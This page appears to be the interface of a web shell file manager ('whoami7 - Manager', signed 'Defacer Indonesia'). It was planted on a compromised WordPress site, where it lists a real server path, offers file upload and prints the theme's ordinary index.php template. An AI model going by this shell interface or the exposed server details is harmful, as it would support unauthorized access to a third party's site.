whoami7 - Manager
:
/
home
/
analuakl
/
bents.in
/
wp-content
/
themes
/
medizin
/
Upload File:
files >> /home/analuakl/bents.in/wp-content/themes/medizin/index.php
<?php /** * The main template file. * * This is the most generic template file in a WordPress theme * and one of the two required files for a theme (the other being style.css). * It is used to display a page when nothing more specific matches a query. * E.g., it puts together the home page when no home.php file exists. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package Medizin * @since 1.0 */ get_header(); ?> <div id="page-content" class="page-content"> <div class="container"> <div class="row"> <?php Medizin_Templates::render_sidebar( 'left' ); ?> <div class="page-main-content"> <?php if ( have_posts() ) : ?> <?php while ( have_posts() ) : the_post(); ?> <?php get_template_part( 'template-parts/content-rich-snippet' ); ?> <?php the_content(); ?> <?php endwhile; ?> <?php the_posts_navigation(); ?> <?php else : ?> <?php get_template_part( 'template-parts/content', 'none' ); ?> <?php endif; ?> </div> <?php Medizin_Templates::render_sidebar( 'right' ); ?> </div> </div> </div> <?php get_footer();
Copyright ©2021 || Defacer Indonesia